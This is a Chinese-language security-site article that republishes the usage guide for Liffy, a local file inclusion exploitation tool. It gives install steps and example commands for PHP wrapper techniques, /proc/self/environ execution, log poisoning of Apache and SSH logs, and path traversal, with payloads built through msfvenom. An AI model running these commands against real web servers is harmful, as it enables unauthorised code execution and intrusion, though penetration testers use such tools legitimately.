Liffy-本地文件包含利用工具

华盟原创文章投稿奖励计划

Liffy-本地文件包含利用工具 
Liffy-本地文件包含利用工具 

工具安装

确保您正在使用python3安装过程。liffy doesn't support python2

  • 克隆存储库

    • git clone 

      http://github.com/mzfr/liffy

  • 建立虚拟环境

    例如:python3 -m venv liffy

    • python3 -m venv <name-of-virtual-env>

  • 激活虚拟

    • source liffy/bin/activate

  • 安装依赖

    • pip3 install -r requirements.txt

注意 -Liffy使用msfvenom生成php有效负载,因此您应该安装metasploit

工具使用

用法:liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a]                [-ns] [-r] [--ssh] [-l位置] [--cookie cookie]
                网址
位置参数:
  网址URL,以测试 为 LFI
可选参数:
  -h,-- help显示此帮助消息并退出
  -d,--data使用data://技术
  -i,--input使用input://技术
  -e,--expect使用Expect://技术
  -f,--filter使用filter://技术
  -p,--proc使用/ proc / self / environ技术
  -a,--access访问日志技术
  -ns,--nostager直接执行有效负载,请勿使用stager
  -r,-相对使用路径遍历序列进行攻击
  --ssh SSH身份验证日志中毒
  -l位置,-位置位置
                        目标文件的路径(访问日志,身份验证日志等)
  --cookies COOKIES会话cookie 以进行身份验证
检查URL与数据://

选项:-d或--data

例如:python liffy.py

http://example.com/?id= -d

使用输入://检查URL

选项:-i或--input

例如:python liffy.py

http://example.com/?id= -i

检查URL与期望://

选项:-e或--expect

例如:python liffy.py

http://example.com/?id= -e

使用filter://检查URL

选项:-f或--filter

例如:python liffy.py

http://example.com/?id= -f

使用/ proc / self / environ执行代码

选项:-p或--proc

例如:python liffy.py

http://example.com/?id= -p

使用Apache access.log中毒

选项:-a或--access

例如:python liffy.py

http://example.com/?id= -a

使用SSH auth.log中毒

选项:-s或--ssh

例如:python liffy.py

http://example.com/?id= -s

相对遍历目录

选项:-r

此选项可以与其他选项一起使用,以便相对遍历目录。

例如:

- python liffy.py 

http://example.com/?id= -s -r
- python liffy.py 

http://example.com/?id= -p -r
- python liffy.py 

http://example.com/?id= -a -r
指定日志路径

选项:-l或--location

此选项必须与所有日志技术(如authlog,sshlog

例如:

- python liffy.py

 http://example.com/?id= -s -l /var/auth.log
- python liffy.py 

http://example.com/?id= -a -l /var/apache2/access.log

默认情况下,使用以下位置:

  • 对于SSH auth.log- /var/log/auth.log

  • 对于apache2 access.log- /var/log/apache2/access.log


文章来源:

华盟知识星球入口

https://github.com/mzfr/liffy/

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/download/270085.html

发表评论